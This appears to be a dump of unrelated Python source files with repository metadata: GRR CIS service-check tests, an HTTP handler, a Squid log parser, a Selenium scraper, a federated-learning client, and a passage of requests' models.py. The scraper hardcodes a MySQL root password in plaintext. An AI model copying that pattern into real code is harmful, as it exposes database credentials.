should_detect=False)
# xinetd not running and there is a service enabled - no hit
self.RunXinetdCheck(chk_id,
"finger",
"no",
sym,
found,
xinetd=False,
should_detect=False)
def testLegacyXinetdServicesCheck(self):
chk_id = "CIS-SERVICE-LEGACY-SERVICE-ENABLED"
sym = "Found: Legacy services are running."
found = ["telnet is started by XINETD"]
self.RunXinetdCheck(chk_id, "telnet", "no", sym, found)
self.RunXinetdCheck(chk_id,
"telnet",
"yes",
sym,
found,
should_detect=False)
def testUnwantedServicesCheck(self):
chk_id = "CIS-SERVICE-SHOULD-NOT-RUN"
sym = "Found: Remote administration services are running."
found = ["webmin is started by XINETD"]
self.RunXinetdCheck(chk_id, "webmin", "no", sym, found)
self.RunXinetdCheck(chk_id,
"webmin",
"yes",
sym,
found,
should_detect=False)
class SysVInitStateTests(checks_test_lib.HostCheckTest):
results = None
@classmethod
def setUpClass(cls):
cls.LoadCheck("services.yaml")
cls.parser = linux_service_parser.LinuxSysVInitParser().ParseMultiple
def setUp(self, *args, **kwargs):
super(SysVInitStateTests, self).setUp(*args, **kwargs)
self.RunSysVChecks()
def RunSysVChecks(self):
host_data = self.SetKnowledgeBase()
links = ["/etc/rc2.d/S50xinetd", "/etc/rc2.d/S60wu-ftpd",
"/etc/rc2.d/S10ufw"]
stats, files = linux_service_parser_test.GenTestData(links,
[""] * len(links),
st_mode=41471)
parsed = list(self.parser(stats, files, None))
host_data["LinuxServices"] = self.SetArtifactData(parsed=parsed)
self.results = self.RunChecks(host_data)
def testEmptyXinetdCheck(self):
chk_id = "CIS-INETD-WITH-NO-SERVICES"
sym = "Missing attribute: xinetd running with no xinetd-managed services."
self.assertCheckDetectedAnom(chk_id, self.results, sym)
def testLegacyServicesCheck(self):
chk_id = "CIS-SERVICE-LEGACY-SERVICE-ENABLED"
sym = "Found: Legacy services are running."
found = ["wu-ftpd is started by INIT"]
self.assertCheckDetectedAnom(chk_id, self.results, sym, found)
def testRequiredServicesNotRunningCheck(self):
chk_id = "CIS-SERVICE-SHOULD-RUN"
sym = "Missing attribute: Sysstat is not started at boot time."
self.assertCheckDetectedAnom(chk_id, self.results, sym)
class ListeningServiceTests(checks_test_lib.HostCheckTest):
@classmethod
def setUpClass(cls):
cls.LoadCheck("services.yaml")
def GenHostData(self):
# Create some host_data..
host_data = self.SetKnowledgeBase()
loop4 = self.AddListener("127.0.0.1", 6000)
loop6 = self.AddListener("::1", 6000, "INET6")
ext4 = self.AddListener("10.1.1.1", 6000)
ext6 = self.AddListener("fc00::1", 6000, "INET6")
x11 = rdf_client.Process(name="x11", pid=1233, connections=[loop4, loop6])
xorg = rdf_client.Process(name="xorg",
pid=1234,
connections=[loop4, loop6, ext4, ext6])
sshd = rdf_client.Process(name="sshd",
pid=1235,
connections=[loop4, loop6, ext4, ext6])
# Note: ListProcessesGrr is a flow artifact, hence it needs to be of
# raw context.
host_data["ListProcessesGrr"] = self.SetArtifactData(raw=[x11, xorg, sshd])
return host_data
def testFindListeningServicesCheck(self):
chk_id = "CIS-SERVICE-SHOULD-NOT-LISTEN"
sym = "Found: Insecure services are accessible over the network."
found = ["xorg (pid 1234) listens on 127.0.0.1,::1,10.1.1.1,fc00::1"]
host_data = self.GenHostData()
results = self.RunChecks(host_data)
self.assertCheckDetectedAnom(chk_id, results, sym, found)
def testFindNoRunningLogserver(self):
chk_id = "CIS-SERVICE-LOGSERVER-RUNNING"
sym = "Missing attribute: Logging software is not running."
context = "RAW"
found = ["Expected state was not found"]
host_data = self.GenHostData()
# Try it without rsyslog.
results = self.RunChecks(host_data)
self.assertCheckDetectedAnom(chk_id, results, sym, found)
# Now rsyslog is running.
logs = rdf_client.Process(name="rsyslogd", pid=1236)
host_data["ListProcessesGrr"][context].append(logs)
results = self.RunChecks(host_data)
self.assertCheckUndetected(chk_id, results)
# Check with some problematic real-world data.
host_data = self.GenHostData() # Reset the host_data.
# Added a non-logger process. We expect to raise an anom.
proc1 = rdf_client.Process(name="python",
pid=10554,
ppid=1,
exe="/usr/bin/python",
cmdline=["/usr/bin/python", "-E",
"/usr/sbin/foo_agent",
"/etc/foo/conf.d/rsyslogd.conf",
"/etc/foo/foobar.conf"])
host_data["ListProcessesGrr"][context].append(proc1)
results = self.RunChecks(host_data)
self.assertCheckDetectedAnom(chk_id, results, sym, found)
# Now add a logging service proc. We expect no anom this time.
proc2 = rdf_client.Process(name="rsyslogd",
pid=10200,
ppid=1,
exe="/sbin/rsyslogd",
cmdline=["/sbin/rsyslogd", "-i",
"/var/run/rsyslogd.pid", "-m", "0"])
host_data["ListProcessesGrr"][context].append(proc2)
results = self.RunChecks(host_data)
self.assertCheckUndetected(chk_id, results)
# Add yet another non-logger process. We should still raise no anom.
proc3 = rdf_client.Process(name="foobar",
pid=31337,
ppid=1,
exe="/usr/local/bin/foobar",
cmdline=["/usr/local/bin/foobar", "--test",
"args"])
host_data["ListProcessesGrr"][context].append(proc3)
results = self.RunChecks(host_data)
self.assertCheckUndetected(chk_id, results)
def main(argv):
test_lib.GrrTestProgram(argv=argv)
if __name__ == "__main__":
flags.StartMain(main)
| 38.865306
| 80
| 0.584016
|
84986dba79fc0c9f5b7e05abdc15e14e487abe70
| 3,377
|
py
|
Python
|
REST_vs_AMQP/REST/DefaultHTTPRequestHandler.py
|
James-Chapman/python-code-snippets
|
9d3678055dc0d9ef2d5f10da6673477e64ba7b48
|
[
"BSD-2-Clause"
] | null | null | null |
REST_vs_AMQP/REST/DefaultHTTPRequestHandler.py
|
James-Chapman/python-code-snippets
|
9d3678055dc0d9ef2d5f10da6673477e64ba7b48
|
[
"BSD-2-Clause"
] | null | null | null |
REST_vs_AMQP/REST/DefaultHTTPRequestHandler.py
|
James-Chapman/python-code-snippets
|
9d3678055dc0d9ef2d5f10da6673477e64ba7b48
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#===============================================================================
# Author : J.Chapman
# License : BSD
# Date : 4 August 2013
# Description : Python 3 Default HTTP Request Handler
#===============================================================================
import http.server
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class DefaultHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
"""
Default HTTP Request Handler Interface class.
"""
def do_OPTIONS(self):
"""
Default OPTIONS function for the Request Handler
"""
try:
logger.debug("OPTIONS request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_OPTIONS()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_OPTIONS(): {0}".format(ex))
def do_HEAD(self):
"""
Default HEAD function for the Request Handler
"""
try:
logger.debug("HEAD request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_HEAD()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_HEAD(): {0}".format(ex))
def do_GET(self):
"""
Default GET function for the Request Handler
"""
try:
logger.debug("GET request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_GET()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_GET(): {0}".format(ex))
def do_PUT(self):
"""
Default PUT function for the Request Handler
"""
try:
logger.debug("PUT request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_PUT()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_PUT(): {0}".format(ex))
def do_POST(self):
"""
Default POST function for the Request Handler
"""
try:
logger.debug("POST request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_POST()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_POST(): {0}".format(ex))
def _handle_OPTIONS(self):
"""
Handle OPTIONS function. Override this method.
"""
self.send_response(501, "Not implemented")
def _handle_HEAD(self):
"""
Handle HEAD function. Override this method.
"""
self.send_response(501, "Not implemented")
def _handle_GET(self):
"""
Handle GET function. Override this method.
"""
self.send_response(501, "Not implemented")
def _handle_PUT(self):
"""
Handle PUT function. Override this method.
"""
self.send_response(501, "Not implemented")
def _handle_POST(self):
"""
Handle POST function. Override this method.
"""
self.send_response(501, "Not implemented")
| 29.884956
| 102
| 0.561149
|
1988a925da1ac98ecdee2533ec29863a23d6c060
| 905
|
py
|
Python
|
allennlp/data/fields/__init__.py
|
tianjianjiang/allennlp
|
0839f5c263911ec5ff04a2ebe575493c7e0436ef
|
[
"Apache-2.0"
] | 2
|
2019-12-03T20:04:56.000Z
|
2021-03-29T10:38:06.000Z
|
allennlp/data/fields/__init__.py
|
tianjianjiang/allennlp
|
0839f5c263911ec5ff04a2ebe575493c7e0436ef
|
[
"Apache-2.0"
] | 5
|
2021-05-03T14:40:33.000Z
|
2021-05-03T14:40:34.000Z
|
allennlp/data/fields/__init__.py
|
tianjianjiang/allennlp
|
0839f5c263911ec5ff04a2ebe575493c7e0436ef
|
[
"Apache-2.0"
] | 2
|
2019-12-21T05:58:44.000Z
|
2021-08-16T07:41:21.000Z
|
"""
A :class:`~allennlp.data.fields.field.Field` is some piece of a data instance
that ends up as an array in a model.
"""
from allennlp.data.fields.field import Field
from allennlp.data.fields.array_field import ArrayField
from allennlp.data.fields.adjacency_field import AdjacencyField
from allennlp.data.fields.index_field import IndexField
from allennlp.data.fields.label_field import LabelField
from allennlp.data.fields.multilabel_field import MultiLabelField
from allennlp.data.fields.list_field import ListField
from allennlp.data.fields.metadata_field import MetadataField
from allennlp.data.fields.sequence_field import SequenceField
from allennlp.data.fields.sequence_label_field import SequenceLabelField
from allennlp.data.fields.span_field import SpanField
from allennlp.data.fields.text_field import TextField
from allennlp.data.fields.namespace_swapping_field import NamespaceSwappingField
| 47.631579
| 80
| 0.859669
|
18de46a67e368cc641ee87ec1bd201dd0ecb8e0a
| 4,164
|
py
|
Python
|
lib/squidlog.py
|
mnot/squidpeek
|
9479f4791f56ffe3d3465b6d515c802b9c6cb1a1
|
[
"Unlicense"
] | 2
|
2016-02-04T07:34:32.000Z
|
2016-04-03T19:58:09.000Z
|
lib/squidlog.py
|
mnot/squidpeek
|
9479f4791f56ffe3d3465b6d515c802b9c6cb1a1
|
[
"Unlicense"
] | null | null | null |
lib/squidlog.py
|
mnot/squidpeek
|
9479f4791f56ffe3d3465b6d515c802b9c6cb1a1
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
'''
Squid Web proxy cache log parsing classes.
'''
# (c) 1998-2007 Copyright Mark Nottingham
# <mnot@pobox.com>
#
# This software may be freely distributed, modified and used,
# provided that this copyright notice remain intact.
#
# This software is provided 'as is' without warranty of any kind.
# Squid Access Logfile Format
# ---------------------------
#
# Version 1.1 Access log
#
# timestamp elapsed_time client log_tag/status bytes method URL rfc931 \
# peer_tag/peerhost mimetype
#
# rfc931: identd info, - otherwise
#
#
# Squid Store Logfile Format
# --------------------------
#
# Version 1.1 Store log
#
# time action status datehdr lastmod expires type expect-len/real-len \
# method key
#
#
# for more information about both formats, see the Squid FAQ at
# http://squid.nlanr.net/
__version__ = '2.0'
from string import atoi, atof, split, join, lower
from re import compile
from urllib import unquote
import sys
class AccessParser:
''' Splitting Squid Access Logfile Parser '''
_mime_splitter = compile("\[(.*?)\] \[(.*?)\]")
_mime_indexer = compile("%0d%0a")
_mime_hasher = compile("([\w\-_]+):\s*(.*)$")
_time_headers = ['date', 'last-modified', 'expires']
def __init__(self, file_descriptor, parse_headers=False, debug=False):
self._fd = file_descriptor
self.parse_headers = parse_headers
self.debug = debug
self.num_processed = 0
self.num_error = 0
def __iter__(self):
return self
def next(self):
while 1: # loop until we find a valid line, or end
line = self._fd.next()
self.num_processed += 1
n = split(line, None)
try:
o = {
'utime': int(float(n[0])),
'elapsed': int(n[1]),
'client': n[2],
'bytes': int(n[4]),
'method': n[5],
'url': n[6],
'ident': n[7],
'mimetype': n[9]
}
o['log_tag'], status = split(n[3], '/', 2)
o['status'] = int(status)
o['peer_tag'], o['peerhost'] = split(n[8], '/', 2)
if len(n) > 10:
if self.parse_headers and n[10][0] == '[': # mime headers present
o['hdr_request'], o['hdr_response'] = self._parse_mime(" ".join(n[10:]))
else: # some other fields; just save them raw in extra...
i = 0
for field in n[10:]:
i += 1
o['extra_%s' % i] = field
return o
except Exception, why:
self.num_error = self.num_error + 1
if self.debug:
sys.stderr.write("PARSE ERROR line %s: %s\n" % (
self.num_processed, why
))
continue
def _parse_mime(self, raw):
match = self._mime_splitter.match(raw)
if not match:
return {}, {}
return ( self._process_hdr(match.group(1)),
self._process_hdr(match.group(2)) )
def _process_hdr(self, raw_header):
from time import mktime, timezone
from rfc822 import parsedate
hdrs = {}
header_list = self._mime_indexer.split(raw_header)
for header in header_list:
match = self._mime_hasher.match(header)
if not match:
continue
key = lower(match.group(1))
value = unquote(match.group(2))
if key in self._time_headers:
value = mktime(parsedate(value)) - timezone
hdrs[key] = value
return hdrs
def test_access():
log = AccessParser(sys.stdin)
for line in log:
print "%s %s %s" % (line['url'], line['status'], line['log_tag'])
print "lines: %s" % (log.num_processed)
print "error: %s" % (log.num_error)
if __name__ == '__main__':
test_access()
| 28.326531
| 102
| 0.513929
|
d50ef794e919c65ee51955b99bc1bb9db1a2eea4
| 1,958
|
py
|
Python
|
algotrader/trading/subscription.py
|
alexcwyu/python-trading
|
a494f602411a3ebfdecae002a16a5ea93fc7a046
|
[
"Apache-2.0"
] | 17
|
2016-03-30T21:52:30.000Z
|
2021-05-01T18:21:48.000Z
|
algotrader/trading/subscription.py
|
ajmal017/python-trading
|
a494f602411a3ebfdecae002a16a5ea93fc7a046
|
[
"Apache-2.0"
] | 2
|
2016-10-04T19:29:05.000Z
|
2017-02-01T19:24:39.000Z
|
algotrader/trading/subscription.py
|
ajmal017/python-trading
|
a494f602411a3ebfdecae002a16a5ea93fc7a046
|
[
"Apache-2.0"
] | 9
|
2016-04-24T05:05:26.000Z
|
2020-05-03T13:01:34.000Z
|
from algotrader.model.market_data_pb2 import MarketDataSubscriptionRequest
from algotrader.model.model_factory import ModelFactory
from algotrader.utils.market_data import get_subscription_type, get_bar_size, get_bar_type
class MarketDataSubscriber(object):
def subscript_market_data(self, feed, instruments, subscription_types, from_date=None, to_date=None):
for sub_req in self.build_subscription_requests(feed.id(), instruments, subscription_types, from_date, to_date):
feed.subscribe_mktdata(sub_req)
def build_subscription_requests(self, feed_id, instruments, subscription_types, from_date=None, to_date=None):
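        """Build one MarketDataSubscriptionRequest per (instrument, subscription_type).

        Descriptive note (added): each subscription_type is a dotted string of the
        form "<SubscriptionType>.<ProviderId>[.<BarType>.<BarSize>]"; the bar-specific
        parts are only consulted when the subscription type is Bar (see below).
        """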
reqs = []
for instrument in instruments:
for subscription_type in subscription_types:
attrs = subscription_type.split(".")
md_type = get_subscription_type(attrs[0])
md_provider_id = attrs[1]
bar_type = get_bar_type(attrs[2]) if md_type == MarketDataSubscriptionRequest.Bar else None
bar_size = get_bar_size(attrs[3]) if md_type == MarketDataSubscriptionRequest.Bar else None
reqs.append(ModelFactory.build_market_data_subscription_request(type=md_type,
inst_id=instrument.inst_id,
feed_id=feed_id,
md_provider_id=md_provider_id,
bar_type=bar_type,
bar_size=bar_size,
from_date=from_date,
to_date=to_date))
return reqs
| 65.266667
| 120
| 0.533197
|
b45fde003be43a9cd530f2545f36a3fa7bdb7ed1
| 2,411
|
py
|
Python
|
exercise5.py
|
regsevillasibal/FTW3_Webscrapping
|
ed64cd866858e612e3a99f9144e6967c687e057f
|
[
"Apache-2.0"
] | null | null | null |
exercise5.py
|
regsevillasibal/FTW3_Webscrapping
|
ed64cd866858e612e3a99f9144e6967c687e057f
|
[
"Apache-2.0"
] | null | null | null |
exercise5.py
|
regsevillasibal/FTW3_Webscrapping
|
ed64cd866858e612e3a99f9144e6967c687e057f
|
[
"Apache-2.0"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
import os
import pymysql
conn = pymysql.connect(host='127.0.0.1',user='root', passwd = 'g2Rc*ys12', db = 'mysql',
charset = 'utf8')
cur = conn.cursor()
cur.execute("USE scraperdb")
def store(agency, region, position, plantilla, postingDate, closingDate):
    # Insert one scraped job listing. The original exercise left this query
    # unfinished; the table/column names are assumptions (see the CREATE TABLE
    # sketch above) and should be adjusted to the real schema.
    cur.execute(
        "INSERT INTO job_listings "
        "(agency, region, position, plantilla, posting_date, closing_date) "
        "VALUES (%s, %s, %s, %s, %s, %s)",
        (agency, region, position, plantilla, postingDate, closingDate))
    conn.commit()
dirpath = os.getcwd()
filepath = dirpath + '/chromedriver'
print('Path to Driver: ' + filepath)
browser = webdriver.Chrome(executable_path = filepath)
browser.get("http://csc.gov.ph/career/index.php")
try:
# Wait as long as required, or maximum of 5 sec for element to appear
# If successful, retrieves the element
element = WebDriverWait(browser,5).until(
EC.presence_of_element_located((By.XPATH, '/html/body/div[1]/div[4]/button/span')))
element.click()
# Find where the element that contains all of the listings
listingsElement = WebDriverWait(browser, 5).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="jobs"]/tbody')))
# Then find all of the listings by using the class name found in all of the individual listings
listings = listingsElement.find_elements(By.TAG_NAME, "tr") # get all of the rows in the table
for row in listings:
# Get the columns from the table row
agency = row.find_elements(By.TAG_NAME, "td")[0] #note: index starts from 0, so 0 is 1st column, 1 is 2nd column, 2 is 3rd column, etc
print(agency.text)
#prints text from the element
region = row.find_elements(By.TAG_NAME, "td")[1]
print(region.text)
positionTitle = row.find_elements(By.TAG_NAME, "td")[2]
print(positionTitle.text)
plantilla = row.find_elements(By.TAG_NAME, "td")[3]
print(plantilla.text)
postingDate = row.find_elements(By.TAG_NAME, "td")[3]
print(postingDate.text)
closingDate = row.find_elements(By.TAG_NAME, "td")[4]
print(closingDate.text)
print("######################")
# Store the scraped row using the store() helper completed above.
store(agency.text, region.text, positionTitle.text, plantilla.text,
      postingDate.text, closingDate.text)
except TimeoutException:
print("Failed to load")
finally:
browser.quit()
| 34.942029
| 142
| 0.685193
|
39d7f09f68fd7f6a6c5fe1af6ef7c2ed4bb2fc10
| 4,011
|
py
|
Python
|
plato/clients/simple.py
|
iQua/plato
|
76fdac06af8b4d85922cd12749b4a687e3161745
|
[
"Apache-2.0"
] | null | null | null |
plato/clients/simple.py
|
iQua/plato
|
76fdac06af8b4d85922cd12749b4a687e3161745
|
[
"Apache-2.0"
] | null | null | null |
plato/clients/simple.py
|
iQua/plato
|
76fdac06af8b4d85922cd12749b4a687e3161745
|
[
"Apache-2.0"
] | 1
|
2021-05-18T15:03:32.000Z
|
2021-05-18T15:03:32.000Z
|
"""
A basic federated learning client who sends weight updates to the server.
"""
import logging
import time
from dataclasses import dataclass
from plato.algorithms import registry as algorithms_registry
from plato.config import Config
from plato.datasources import registry as datasources_registry
from plato.samplers import registry as samplers_registry
from plato.trainers import registry as trainers_registry
from plato.clients import base
@dataclass
class Report(base.Report):
"""Report from a simple client, to be sent to the federated learning server."""
training_time: float
data_loading_time: float
class Client(base.Client):
"""A basic federated learning client who sends simple weight updates."""
def __init__(self, model=None, datasource=None, trainer=None):
super().__init__()
self.model = model
self.datasource = datasource
self.trainer = trainer
self.trainset = None # Training dataset
self.testset = None # Testing dataset
self.algorithm = None
self.sampler = None
self.data_loading_time = None
self.data_loading_time_sent = False
def __repr__(self):
return 'Client #{}.'.format(self.client_id)
def configure(self) -> None:
"""Prepare this client for training."""
if self.trainer is None:
self.trainer = trainers_registry.get(self.client_id, self.model)
self.trainer.set_client_id(self.client_id)
self.algorithm = algorithms_registry.get(self.trainer, self.client_id)
def load_data(self) -> None:
"""Generating data and loading them onto this client."""
data_loading_start_time = time.time()
logging.info("[Client #%s] Loading its data source...", self.client_id)
if self.datasource is None:
self.datasource = datasources_registry.get()
self.data_loaded = True
logging.info("[Client #%s] Dataset size: %s", self.client_id,
self.datasource.num_train_examples())
# Setting up the data sampler
self.sampler = samplers_registry.get(self.datasource, self.client_id)
if hasattr(Config().trainer, 'use_mindspore'):
# MindSpore requires samplers to be used while constructing
# the dataset
self.trainset = self.datasource.get_train_set(self.sampler)
else:
# PyTorch uses samplers when loading data with a data loader
self.trainset = self.datasource.get_train_set()
if Config().clients.do_test:
# Set the testset if local testing is needed
self.testset = self.datasource.get_test_set()
self.data_loading_time = time.time() - data_loading_start_time
def load_payload(self, server_payload) -> None:
"""Loading the server model onto this client."""
self.algorithm.load_weights(server_payload)
async def train(self):
"""The machine learning training workload on a client."""
training_start_time = time.time()
logging.info("[Client #%s] Started training.", self.client_id)
# Perform model training
self.trainer.train(self.trainset, self.sampler)
# Extract model weights and biases
weights = self.algorithm.extract_weights()
# Generate a report for the server, performing model testing if applicable
if Config().clients.do_test:
accuracy = self.trainer.test(self.testset)
logging.info("[Client #{:d}] Test accuracy: {:.2f}%".format(
self.client_id, 100 * accuracy))
else:
accuracy = 0
training_time = time.time() - training_start_time
data_loading_time = 0
if not self.data_loading_time_sent:
data_loading_time = self.data_loading_time
self.data_loading_time_sent = True
return Report(self.sampler.trainset_size(), accuracy, training_time,
data_loading_time), weights
| 34.878261
| 83
| 0.665171
|
6e634f814e10c50d15e1259dc87340997f502b49
| 34,155
|
py
|
Python
|
virtual/lib/python3.6/site-packages/pip/_vendor/requests/models.py
|
EugeneZnm/LEVELS
|
21874a7585b559795d49b3334e7bb9907af7888a
|
[
"Unlicense"
] | null | null | null |
virtual/lib/python3.6/site-packages/pip/_vendor/requests/models.py
|
EugeneZnm/LEVELS
|
21874a7585b559795d49b3334e7bb9907af7888a
|
[
"Unlicense"
] | 4
|
2020-06-05T19:28:58.000Z
|
2021-09-08T00:33:00.000Z
|
virtual/lib/python3.6/site-packages/pip/_vendor/requests/models.py
|
EugeneZnm/LEVELS
|
21874a7585b559795d49b3334e7bb9907af7888a
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import datetime
import sys
# Import encoding now, to avoid implicit import later.
# Implicit import within threads may cause LookupError when standard library is in a ZIP,
# such as in Embedded Python. See https://github.com/requests/requests/issues/3578.
import encodings.idna
from pip._vendor.urllib3.fields import RequestField
from pip._vendor.urllib3.filepost import encode_multipart_formdata
from pip._vendor.urllib3.util import parse_url
from pip._vendor.urllib3.exceptions import (
DecodeError, ReadTimeoutError, ProtocolError, LocationParseError)
from io import UnsupportedOperation
from .hooks import default_hooks
from .structures import CaseInsensitiveDict
from .auth import HTTPBasicAuth
from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
from .exceptions import (
HTTPError, MissingSchema, InvalidURL, ChunkedEncodingError,
ContentDecodingError, ConnectionError, StreamConsumedError)
from ._internal_utils import to_native_string, unicode_is_ascii
from .utils import (
guess_filename, get_auth_from_url, requote_uri,
stream_decode_response_unicode, to_key_val_list, parse_header_links,
iter_slices, guess_json_utf, super_len, check_header_validity)
from .compat import (
Callable, Mapping,
cookielib, urlunparse, urlsplit, urlencode, str, bytes,
is_py2, chardet, builtin_str, basestring)
from .compat import json as complexjson
from .status_codes import codes
#: The set of HTTP status codes that indicate an automatically
#: processable redirect.
REDIRECT_STATI = (
codes.moved, # 301
codes.found, # 302
codes.other, # 303
codes.temporary_redirect, # 307
codes.permanent_redirect, # 308
)
DEFAULT_REDIRECT_LIMIT = 30
CONTENT_CHUNK_SIZE = 10 * 1024
ITER_CHUNK_SIZE = 512
class RequestEncodingMixin(object):
@property
def path_url(self):
"""Build the path URL to use."""
url = []
p = urlsplit(self.url)
path = p.path
if not path:
path = '/'
url.append(path)
query = p.query
if query:
url.append('?')
url.append(query)
return ''.join(url)
@staticmethod
def _encode_params(data):
"""Encode parameters in a piece of data.
Will successfully encode parameters when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
if parameters are supplied as a dict.
"""
if isinstance(data, (str, bytes)):
return data
elif hasattr(data, 'read'):
return data
elif hasattr(data, '__iter__'):
result = []
for k, vs in to_key_val_list(data):
if isinstance(vs, basestring) or not hasattr(vs, '__iter__'):
vs = [vs]
for v in vs:
if v is not None:
result.append(
(k.encode('utf-8') if isinstance(k, str) else k,
v.encode('utf-8') if isinstance(v, str) else v))
return urlencode(result, doseq=True)
else:
return data
@staticmethod
def _encode_files(files, data):
"""Build the body for a multipart/form-data request.
Will successfully encode files when passed as a dict or a list of
tuples. Order is retained if data is a list of tuples but arbitrary
if parameters are supplied as a dict.
The tuples may be 2-tuples (filename, fileobj), 3-tuples (filename, fileobj, content_type)
or 4-tuples (filename, fileobj, content_type, custom_headers).
"""
if (not files):
raise ValueError("Files must be provided.")
elif isinstance(data, basestring):
raise ValueError("Data must not be a string.")
new_fields = []
fields = to_key_val_list(data or {})
files = to_key_val_list(files or {})
for field, val in fields:
if isinstance(val, basestring) or not hasattr(val, '__iter__'):
val = [val]
for v in val:
if v is not None:
# Don't call str() on bytestrings: in Py3 it all goes wrong.
if not isinstance(v, bytes):
v = str(v)
new_fields.append(
(field.decode('utf-8') if isinstance(field, bytes) else field,
v.encode('utf-8') if isinstance(v, str) else v))
for (k, v) in files:
# support for explicit filename
ft = None
fh = None
if isinstance(v, (tuple, list)):
if len(v) == 2:
fn, fp = v
elif len(v) == 3:
fn, fp, ft = v
else:
fn, fp, ft, fh = v
else:
fn = guess_filename(v) or k
fp = v
if isinstance(fp, (str, bytes, bytearray)):
fdata = fp
elif hasattr(fp, 'read'):
fdata = fp.read()
elif fp is None:
continue
else:
fdata = fp
rf = RequestField(name=k, data=fdata, filename=fn, headers=fh)
rf.make_multipart(content_type=ft)
new_fields.append(rf)
body, content_type = encode_multipart_formdata(new_fields)
return body, content_type
class RequestHooksMixin(object):
def register_hook(self, event, hook):
"""Properly register a hook."""
if event not in self.hooks:
raise ValueError('Unsupported event specified, with event name "%s"' % (event))
if isinstance(hook, Callable):
self.hooks[event].append(hook)
elif hasattr(hook, '__iter__'):
self.hooks[event].extend(h for h in hook if isinstance(h, Callable))
def deregister_hook(self, event, hook):
"""Deregister a previously registered hook.
Returns True if the hook existed, False if not.
"""
try:
self.hooks[event].remove(hook)
return True
except ValueError:
return False
class Request(RequestHooksMixin):
"""A user-created :class:`Request <Request>` object.
Used to prepare a :class:`PreparedRequest <PreparedRequest>`, which is sent to the server.
:param method: HTTP method to use.
:param url: URL to send.
:param headers: dictionary of headers to send.
:param files: dictionary of {filename: fileobject} files to multipart upload.
:param data: the body to attach to the request. If a dictionary is provided, form-encoding will take place.
:param json: json for the body to attach to the request (if files or data is not specified).
:param params: dictionary of URL parameters to append to the URL.
:param auth: Auth handler or (user, pass) tuple.
:param cookies: dictionary or CookieJar of cookies to attach to this request.
:param hooks: dictionary of callback hooks, for internal usage.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> req.prepare()
<PreparedRequest [GET]>
"""
def __init__(self,
method=None, url=None, headers=None, files=None, data=None,
params=None, auth=None, cookies=None, hooks=None, json=None):
# Default empty dicts for dict params.
data = [] if data is None else data
files = [] if files is None else files
headers = {} if headers is None else headers
params = {} if params is None else params
hooks = {} if hooks is None else hooks
self.hooks = default_hooks()
for (k, v) in list(hooks.items()):
self.register_hook(event=k, hook=v)
self.method = method
self.url = url
self.headers = headers
self.files = files
self.data = data
self.json = json
self.params = params
self.auth = auth
self.cookies = cookies
def __repr__(self):
return '<Request [%s]>' % (self.method)
def prepare(self):
"""Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it."""
p = PreparedRequest()
p.prepare(
method=self.method,
url=self.url,
headers=self.headers,
files=self.files,
data=self.data,
json=self.json,
params=self.params,
auth=self.auth,
cookies=self.cookies,
hooks=self.hooks,
)
return p
class PreparedRequest(RequestEncodingMixin, RequestHooksMixin):
"""The fully mutable :class:`PreparedRequest <PreparedRequest>` object,
containing the exact bytes that will be sent to the server.
Generated from either a :class:`Request <Request>` object or manually.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> r = req.prepare()
<PreparedRequest [GET]>
>>> s = requests.Session()
>>> s.send(r)
<Response [200]>
"""
def __init__(self):
#: HTTP verb to send to the server.
self.method = None
#: HTTP URL to send the request to.
self.url = None
#: dictionary of HTTP headers.
self.headers = None
# The `CookieJar` used to create the Cookie header will be stored here
# after prepare_cookies is called
self._cookies = None
#: request body to send to the server.
self.body = None
#: dictionary of callback hooks, for internal usage.
self.hooks = default_hooks()
#: integer denoting starting position of a readable file-like body.
self._body_position = None
def prepare(self,
method=None, url=None, headers=None, files=None, data=None,
params=None, auth=None, cookies=None, hooks=None, json=None):
"""Prepares the entire request with the given parameters."""
self.prepare_method(method)
self.prepare_url(url, params)
self.prepare_headers(headers)
self.prepare_cookies(cookies)
self.prepare_body(data, files, json)
self.prepare_auth(auth, url)
# Note that prepare_auth must be last to enable templates schemes
# such as OAuth to work on a fully prepared request.
# This MUST go after prepare_auth. Authenticators could add a hook
self.prepare_hooks(hooks)
def __repr__(self):
return '<PreparedRequest [%s]>' % (self.method)
def copy(self):
p = PreparedRequest()
p.method = self.method
p.url = self.url
p.headers = self.headers.copy() if self.headers is not None else None
p._cookies = _copy_cookie_jar(self._cookies)
p.body = self.body
p.hooks = self.hooks
p._body_position = self._body_position
return p
def prepare_method(self, method):
"""Prepares the given HTTP method."""
self.method = method
if self.method is not None:
self.method = to_native_string(self.method.upper())
@staticmethod
def _get_idna_encoded_host(host):
from pip._vendor import idna
try:
host = idna.encode(host, uts46=True).decode('utf-8')
except idna.IDNAError:
raise UnicodeError
return host
def prepare_url(self, url, params):
"""Prepares the given HTTP URL."""
#: Accept objects that have string representations.
#: We're unable to blindly call unicode/str functions
#: as this will include the bytestring indicator (b'')
#: on python 3.x.
#: https://github.com/requests/requests/pull/2238
if isinstance(url, bytes):
